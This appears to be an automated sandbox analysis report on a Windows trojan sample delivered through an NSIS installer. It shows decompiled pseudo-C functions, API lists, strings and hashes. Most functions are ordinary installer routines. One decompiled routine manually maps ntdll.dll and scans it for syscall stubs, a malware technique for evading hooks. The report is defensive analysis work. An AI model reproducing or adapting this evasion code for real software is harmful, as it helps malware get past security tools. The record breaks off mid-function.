                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 2803837635-1061896000
                                                          • Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                          • Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
                                                          • Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                          • Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E00401759(FILETIME* __ebx, void* __eflags) {
                                                          				void* _t33;
                                                          				void* _t41;
                                                          				void* _t43;
                                                          				FILETIME* _t49;
                                                          				FILETIME* _t62;
                                                          				void* _t64;
                                                          				signed int _t70;
                                                          				FILETIME* _t71;
                                                          				FILETIME* _t75;
                                                          				signed int _t77;
                                                          				void* _t80;
                                                          				CHAR* _t82;
                                                          				void* _t85;
                                                          
                                                          				_t75 = __ebx;
                                                          				_t82 = E00402BCE(0x31);
                                                          				 *(_t85 - 8) = _t82;
                                                          				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                          				_t33 = E00405C52(_t82);
                                                          				_push(_t82);
                                                          				if(_t33 == 0) {
                                                          					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                          				} else {
                                                          					_push(0x40a450);
                                                          					E0040624D();
                                                          				}
                                                          				E00406528(0x40a450);
                                                          				while(1) {
                                                          					__eflags =  *(_t85 + 8) - 3;
                                                          					if( *(_t85 + 8) >= 3) {
                                                          						_t64 = E004065C1(0x40a450);
                                                          						_t77 = 0;
                                                          						__eflags = _t64 - _t75;
                                                          						if(_t64 != _t75) {
                                                          							_t71 = _t64 + 0x14;
                                                          							__eflags = _t71;
                                                          							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                          						}
                                                          						asm("sbb eax, eax");
                                                          						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                          						__eflags = _t70;
                                                          						 *(_t85 + 8) = _t70;
                                                          					}
                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                          					if( *(_t85 + 8) == _t75) {
                                                          						E00405DC1(0x40a450);
                                                          					}
                                                          					__eflags =  *(_t85 + 8) - 1;
                                                          					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                          					__eflags = _t41 - 0xffffffff;
                                                          					 *(_t85 - 0xc) = _t41;
                                                          					if(_t41 != 0xffffffff) {
                                                          						break;
                                                          					}
                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                          					if( *(_t85 + 8) != _t75) {
                                                          						E00405374(0xffffffe2,  *(_t85 - 8));
                                                          						__eflags =  *(_t85 + 8) - 2;
                                                          						if(__eflags == 0) {
                                                          							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                          						}
                                                          						L31:
                                                          						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
                                                          						__eflags =  *0x42f4e8;
                                                          						goto L32;
                                                          					} else {
                                                          						E0040624D(0x40ac50, 0x430000);
                                                          						E0040624D(0x430000, 0x40a450);
                                                          						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\hardz\AppData\Local\Temp\nsaBD32.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                          						E0040624D(0x430000, 0x40ac50);
                                                          						_t62 = E00405969("C:\Users\hardz\AppData\Local\Temp\nsaBD32.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                          						__eflags = _t62;
                                                          						if(_t62 == 0) {
                                                          							continue;
                                                          						} else {
                                                          							__eflags = _t62 == 1;
                                                          							if(_t62 == 1) {
                                                          								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
                                                          								L32:
                                                          								_t49 = 0;
                                                          								__eflags = 0;
                                                          							} else {
                                                          								_push(0x40a450);
                                                          								_push(0xfffffffa);
                                                          								E00405374();
                                                          								L29:
                                                          								_t49 = 0x7fffffff;
                                                          							}
                                                          						}
                                                          					}
                                                          					L33:
                                                          					return _t49;
                                                          				}
                                                          				E00405374(0xffffffea,  *(_t85 - 8));
                                                          				 *0x42f514 =  *0x42f514 + 1;
                                                          				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
                                                          				 *0x42f514 =  *0x42f514 - 1;
                                                          				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                          				_t80 = _t43;
                                                          				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                          					L22:
                                                          					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                          				} else {
                                                          					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                          					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                          						goto L22;
                                                          					}
                                                          				}
                                                          				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                          				__eflags = _t80 - _t75;
                                                          				if(_t80 >= _t75) {
                                                          					goto L31;
                                                          				} else {
                                                          					__eflags = _t80 - 0xfffffffe;
                                                          					if(_t80 != 0xfffffffe) {
                                                          						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
                                                          					} else {
                                                          						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
                                                          						lstrcatA(0x40a450,  *(_t85 - 8));
                                                          					}
                                                          					_push(0x200010);
                                                          					_push(0x40a450);
                                                          					E00405969();
                                                          					goto L29;
                                                          				}
                                                          				goto L33;
                                                          			}
















                                                          0x00401759
                                                          0x00401760
                                                          0x00401769
                                                          0x0040176c
                                                          0x0040176f
                                                          0x00401774
                                                          0x0040177c
                                                          0x00401798
                                                          0x0040177e
                                                          0x0040177e
                                                          0x0040177f
                                                          0x0040177f
                                                          0x0040179e
                                                          0x004017a8
                                                          0x004017a8
                                                          0x004017ac
                                                          0x004017af
                                                          0x004017b4
                                                          0x004017b6
                                                          0x004017b8
                                                          0x004017bd
                                                          0x004017bd
                                                          0x004017c8
                                                          0x004017c8
                                                          0x004017d9
                                                          0x004017db
                                                          0x004017db
                                                          0x004017dc
                                                          0x004017dc
                                                          0x004017df
                                                          0x004017e2
                                                          0x004017e5
                                                          0x004017e5
                                                          0x004017ec
                                                          0x004017fb
                                                          0x00401800
                                                          0x00401803
                                                          0x00401806
                                                          0x00000000
                                                          0x00000000
                                                          0x00401808
                                                          0x0040180b
                                                          0x00401865
                                                          0x0040186a
                                                          0x004015b0
                                                          0x004027bf
                                                          0x004027bf
                                                          0x00402a5a
                                                          0x00402a5d
                                                          0x00402a5d
                                                          0x00000000
                                                          0x0040180d
                                                          0x00401813
                                                          0x0040181e
                                                          0x0040182b
                                                          0x00401836
                                                          0x0040184c
                                                          0x0040184c
                                                          0x0040184f
                                                          0x00000000
                                                          0x00401855
                                                          0x00401855
                                                          0x00401856
                                                          0x00401873
                                                          0x00402a63
                                                          0x00402a63
                                                          0x00402a63
                                                          0x00401858
                                                          0x00401858
                                                          0x00401859
                                                          0x00401492
                                                          0x00402387
                                                          0x00402387
                                                          0x00402387
                                                          0x00401856
                                                          0x0040184f
                                                          0x00402a65
                                                          0x00402a69
                                                          0x00402a69
                                                          0x00401883
                                                          0x00401888
                                                          0x00401896
                                                          0x0040189b
                                                          0x004018a1
                                                          0x004018a5
                                                          0x004018a7
                                                          0x004018af
                                                          0x004018bb
                                                          0x004018a9
                                                          0x004018a9
                                                          0x004018ad
                                                          0x00000000
                                                          0x00000000
                                                          0x004018ad
                                                          0x004018c4
                                                          0x004018ca
                                                          0x004018cc
                                                          0x00000000
                                                          0x004018d2
                                                          0x004018d2
                                                          0x004018d5
                                                          0x004018ed
                                                          0x004018d7
                                                          0x004018da
                                                          0x004018e3
                                                          0x004018e3
                                                          0x004018f2
                                                          0x004018f7
                                                          0x00402382
                                                          0x00000000
                                                          0x00402382
                                                          0x00000000

                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                            • Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A
                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsaBD32.tmp\System.dll$Call
                                                          • API String ID: 1941528284-3363241983
                                                          • Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                          • Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
                                                          • Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                          • Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 69%
                                                          			E7378370F(intOrPtr _a4) {
                                                          				signed int _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				intOrPtr _v20;
                                                          				void* _v24;
                                                          				signed int _v28;
                                                          				intOrPtr _v32;
                                                          				signed int _v36;
                                                          				intOrPtr _v40;
                                                          				signed int _v44;
                                                          				signed int _v48;
                                                          				intOrPtr _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				intOrPtr _v72;
                                                          				void* _v76;
                                                          				intOrPtr _v80;
                                                          				signed char _v84;
                                                          				long _v88;
                                                          				short _v90;
                                                          				short _v92;
                                                          				short _v94;
                                                          				short _v96;
                                                          				short _v98;
                                                          				short _v100;
                                                          				short _v102;
                                                          				short _v104;
                                                          				short _v106;
                                                          				char _v108;
                                                          				short _t141;
                                                          				short _t142;
                                                          				short _t143;
                                                          				short _t144;
                                                          				short _t145;
                                                          				short _t146;
                                                          				short _t147;
                                                          				short _t148;
                                                          				short _t149;
                                                          				int _t165;
                                                          				signed int _t169;
                                                          				intOrPtr _t175;
                                                          				signed int _t195;
                                                          				signed int _t210;
                                                          				signed int _t222;
                                                          
                                                          				_v24 = _v24 & 0x00000000;
                                                          				_v48 = _v48 & 0x00000000;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t141 = 0x6e;
                                                          				_v108 = _t141;
                                                          				_t142 = 0x74;
                                                          				_v106 = _t142;
                                                          				_t143 = 0x64;
                                                          				_v104 = _t143;
                                                          				_t144 = 0x6c;
                                                          				_v102 = _t144;
                                                          				_t145 = 0x6c;
                                                          				_v100 = _t145;
                                                          				_t146 = 0x2e;
                                                          				_v98 = _t146;
                                                          				_t147 = 0x64;
                                                          				_v96 = _t147;
                                                          				_t148 = 0x6c;
                                                          				_v94 = _t148;
                                                          				_t149 = 0x6c;
                                                          				_v92 = _t149;
                                                          				_v90 = 0;
                                                          				_v16 = _v16 & 0x00000000;
                                                          				_v12 = _v12 & 0x00000000;
                                                          				_v36 = _v36 & 0x00000000;
                                                          				_t23 =  &_v44;
                                                          				 *_t23 = _v44 & 0x00000000;
                                                          				_t222 =  *_t23;
                                                          				_v20 = E7378458C();
                                                          				_v64 = E73784634(_v20, 0x8a111d91);
                                                          				_v68 = E73784634(_v20, 0x170c1ca1);
                                                          				_v52 = E73784634(_v20, 0xa5f15738);
                                                          				_v72 = E73784634(_v20, 0x433a3842);
                                                          				_v56 = E73784634(_v20, 0xd6eb2188);
                                                          				_v60 = E73784634(_v20, 0x50a26af);
                                                          				_v80 = E73784634(_v20, 0x55e38b1f);
                                                          				_v44 = 1;
                                                          				while(1) {
                                                          					_v16 = CreateFileW(E7378478F(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
                                                          					if(_v16 == 0xffffffff) {
                                                          						break;
                                                          					}
                                                          					_v36 = _v68(_v16, 0);
                                                          					__eflags = _v36 - 0xffffffff;
                                                          					if(_v36 != 0xffffffff) {
                                                          						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
                                                          						__eflags = _v12;
                                                          						if(_v12 != 0) {
                                                          							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
                                                          							__eflags = _t165;
                                                          							if(_t165 != 0) {
                                                          								_v76 = _v12;
                                                          								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
                                                          								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
                                                          								_t213 = _v32;
                                                          								_t68 = _t169 + 0x18; // 0x8000018
                                                          								_v40 = _v32 + _t68;
                                                          								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
                                                          								__eflags = _v24;
                                                          								if(_v24 != 0) {
                                                          									E737845A4(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
                                                          									_v28 = _v28 & 0x00000000;
                                                          									while(1) {
                                                          										_t175 = _v32;
                                                          										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
                                                          										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
                                                          											break;
                                                          										}
                                                          										E737845A4(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
                                                          										_t210 = _v28 + 1;
                                                          										__eflags = _t210;
                                                          										_v28 = _t210;
                                                          									}
                                                          									_v48 = E73784634(_v24, _a4);
                                                          									__eflags = _v48;
                                                          									if(_v48 != 0) {
                                                          										__eflags = _v16;
                                                          										if(_v16 != 0) {
                                                          											FindCloseChangeNotification(_v16);
                                                          										}
                                                          										__eflags = _v12;
                                                          										if(_v12 != 0) {
                                                          											VirtualFree(_v12, 0, 0x8000);
                                                          										}
                                                          										_v44 = _v44 & 0x00000000;
                                                          										__eflags = 0;
                                                          										if(0 != 0) {
                                                          											continue;
                                                          										}
                                                          									} else {
                                                          									}
                                                          								} else {
                                                          								}
                                                          							} else {
                                                          							}
                                                          						} else {
                                                          						}
                                                          					} else {
                                                          					}
                                                          					L22:
                                                          					if(_v44 != 0) {
                                                          						if(_v16 != 0) {
                                                          							_v56(_v16);
                                                          						}
                                                          						_v80(0);
                                                          					}
                                                          					_v8 = _v48;
                                                          					while(1 != 0) {
                                                          						if(( *_v8 & 0x000000ff) != 0xb8) {
                                                          							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
                                                          							if(( *_v8 & 0x000000ff) != 0xe9) {
                                                          								__eflags = ( *_v8 & 0x000000ff) - 0xea;
                                                          								if(( *_v8 & 0x000000ff) != 0xea) {
                                                          									_t195 = _v8 + 1;
                                                          									__eflags = _t195;
                                                          									_v8 = _t195;
                                                          								} else {
                                                          									_v8 =  *(_v8 + 1);
                                                          								}
                                                          							} else {
                                                          								_t125 =  *(_v8 + 1) + 5; // 0x5
                                                          								_v8 = _v8 + _t125;
                                                          							}
                                                          							continue;
                                                          						} else {
                                                          						}
                                                          						break;
                                                          					}
                                                          					_v8 = _v8 + 1;
                                                          					_v84 =  *_v8;
                                                          					if(_v24 != 0) {
                                                          						VirtualFree(_v24, 0, 0x8000);
                                                          					}
                                                          					return _v84;
                                                          				}
                                                          				goto L22;
                                                          			}

















































                                                          0x73783715
                                                          0x73783719
                                                          0x7378371d
                                                          0x73783723
                                                          0x73783724
                                                          0x7378372a
                                                          0x7378372b
                                                          0x73783731
                                                          0x73783732
                                                          0x73783738
                                                          0x73783739
                                                          0x7378373f
                                                          0x73783740
                                                          0x73783746
                                                          0x73783747
                                                          0x7378374d
                                                          0x7378374e
                                                          0x73783754
                                                          0x73783755
                                                          0x7378375b
                                                          0x7378375c
                                                          0x73783762
                                                          0x73783766
                                                          0x7378376a
                                                          0x7378376e
                                                          0x73783772
                                                          0x73783772
                                                          0x73783772
                                                          0x7378377b
                                                          0x7378378b
                                                          0x7378379b
                                                          0x737837ab
                                                          0x737837bb
                                                          0x737837cb
                                                          0x737837db
                                                          0x737837eb
                                                          0x737837ee
                                                          0x737837f5
                                                          0x73783814
                                                          0x7378381b
                                                          0x00000000
                                                          0x00000000
                                                          0x7378382a
                                                          0x7378382d
                                                          0x73783831
                                                          0x73783847
                                                          0x7378384a
                                                          0x7378384e
                                                          0x73783864
                                                          0x73783867
                                                          0x73783869
                                                          0x73783873
                                                          0x7378387f
                                                          0x73783885
                                                          0x73783889
                                                          0x7378388c
                                                          0x73783890
                                                          0x737838a5
                                                          0x737838a8
                                                          0x737838ac
                                                          0x737838bf
                                                          0x737838c4
                                                          0x737838d1
                                                          0x737838d1
                                                          0x737838d8
                                                          0x737838db
                                                          0x00000000
                                                          0x00000000
                                                          0x73783906
                                                          0x737838cd
                                                          0x737838cd
                                                          0x737838ce
                                                          0x737838ce
                                                          0x73783918
                                                          0x7378391b
                                                          0x7378391f
                                                          0x73783923
                                                          0x73783927
                                                          0x7378392c
                                                          0x7378392c
                                                          0x7378392f
                                                          0x73783933
                                                          0x7378393f
                                                          0x7378393f
                                                          0x73783942
                                                          0x73783946
                                                          0x73783948
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x73783921
                                                          0x00000000
                                                          0x737838ae
                                                          0x00000000
                                                          0x7378386b
                                                          0x00000000
                                                          0x73783850
                                                          0x00000000
                                                          0x73783833
                                                          0x7378394e
                                                          0x73783952
                                                          0x73783958
                                                          0x7378395d
                                                          0x7378395d
                                                          0x73783962
                                                          0x73783962
                                                          0x73783968
                                                          0x7378396b
                                                          0x7378397b
                                                          0x73783985
                                                          0x7378398a
                                                          0x737839a4
                                                          0x737839a9
                                                          0x737839b9
                                                          0x737839b9
                                                          0x737839ba
                                                          0x737839ab
                                                          0x737839b1
                                                          0x737839b1
                                                          0x7378398c
                                                          0x73783995
                                                          0x73783999
                                                          0x73783999
                                                          0x00000000
                                                          0x00000000
                                                          0x7378397d
                                                          0x00000000
                                                          0x7378397b
                                                          0x737839c3
                                                          0x737839cb
                                                          0x737839d2
                                                          0x737839de
                                                          0x737839de
                                                          0x737839e7
                                                          0x737839e7
                                                          0x00000000

                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 73783811
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 737839DE
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211111185.0000000073783000.00000040.00020000.sdmp, Offset: 73780000, based on PE: true
                                                          • Associated: 00000001.00000002.211060795.0000000073780000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211078275.0000000073781000.00000080.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211091894.0000000073782000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211127067.0000000073785000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                          • Instruction ID: 741335a69f9c9535cc04868e90cea8b79cb1c0a817bcb444d2511d2e19cef6e2
                                                          • Opcode Fuzzy Hash: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                          • Instruction Fuzzy Hash: 91A1DF74E01209EFEF01CFE8C985BEDBBB5AF08715F20445AE511BB2A0D7765A91EB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040583A(CHAR* _a4) {
                                                          				struct _SECURITY_ATTRIBUTES _v16;
                                                          				struct _SECURITY_DESCRIPTOR _v36;
                                                          				int _t22;
                                                          				long _t23;
                                                          
                                                          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                          				_v36.Owner = 0x408384;
                                                          				_v36.Group = 0x408384;
                                                          				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                          				_v16.lpSecurityDescriptor =  &_v36;
                                                          				_v36.Revision = 1;
                                                          				_v36.Control = 4;
                                                          				_v36.Dacl = 0x408374;
                                                          				_v16.nLength = 0xc;
                                                          				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                          				if(_t22 != 0) {
                                                          					L1:
                                                          					return 0;
                                                          				}
                                                          				_t23 = GetLastError();
                                                          				if(_t23 == 0xb7) {
                                                          					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                          						goto L1;
                                                          					}
                                                          					return GetLastError();
                                                          				}
                                                          				return _t23;
                                                          			}







                                                          0x00405845
                                                          0x00405849
                                                          0x0040584c
                                                          0x00405852
                                                          0x00405856
                                                          0x0040585a
                                                          0x00405862
                                                          0x00405869
                                                          0x0040586f
                                                          0x00405876
                                                          0x0040587d
                                                          0x00405885
                                                          0x00405887
                                                          0x00000000
                                                          0x00405887
                                                          0x00405891
                                                          0x00405898
                                                          0x004058ae
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004058b0
                                                          0x004058b4

                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                          • GetLastError.KERNEL32 ref: 00405891
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
                                                          • GetLastError.KERNEL32 ref: 004058B0
                                                          Strings
                                                          • C:\Users\user\Desktop, xrefs: 0040583A
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405860
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                          • API String ID: 3449924974-3254906087
                                                          • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                          • Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
                                                          • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                          • Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004065E8(intOrPtr _a4) {
                                                          				char _v292;
                                                          				int _t10;
                                                          				struct HINSTANCE__* _t14;
                                                          				void* _t16;
                                                          				void* _t21;
                                                          
                                                          				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                          				if(_t10 > 0x104) {
                                                          					_t10 = 0;
                                                          				}
                                                          				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                          					_t16 = 1;
                                                          				} else {
                                                          					_t16 = 0;
                                                          				}
                                                          				_t5 = _t16 + 0x40a014; // 0x5c
                                                          				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                          				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                          				return _t14;
                                                          			}








                                                          0x004065ff
                                                          0x00406608
                                                          0x0040660a
                                                          0x0040660a
                                                          0x0040660e
                                                          0x00406620
                                                          0x0040661a
                                                          0x0040661a
                                                          0x0040661a
                                                          0x00406624
                                                          0x00406638
                                                          0x0040664c
                                                          0x00406653

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                          • wsprintfA.USER32 ref: 00406638
                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\
                                                          • API String ID: 2200240437-4240819195
                                                          • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                          • Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
                                                          • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                          • Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 71%
                                                          			E737842C8(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
                                                          				intOrPtr _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				char _v24;
                                                          				char _v25;
                                                          				char _v26;
                                                          				char _v27;
                                                          				char _v28;
                                                          				char _v29;
                                                          				char _v30;
                                                          				char _v31;
                                                          				char _v32;
                                                          				char _v33;
                                                          				char _v34;
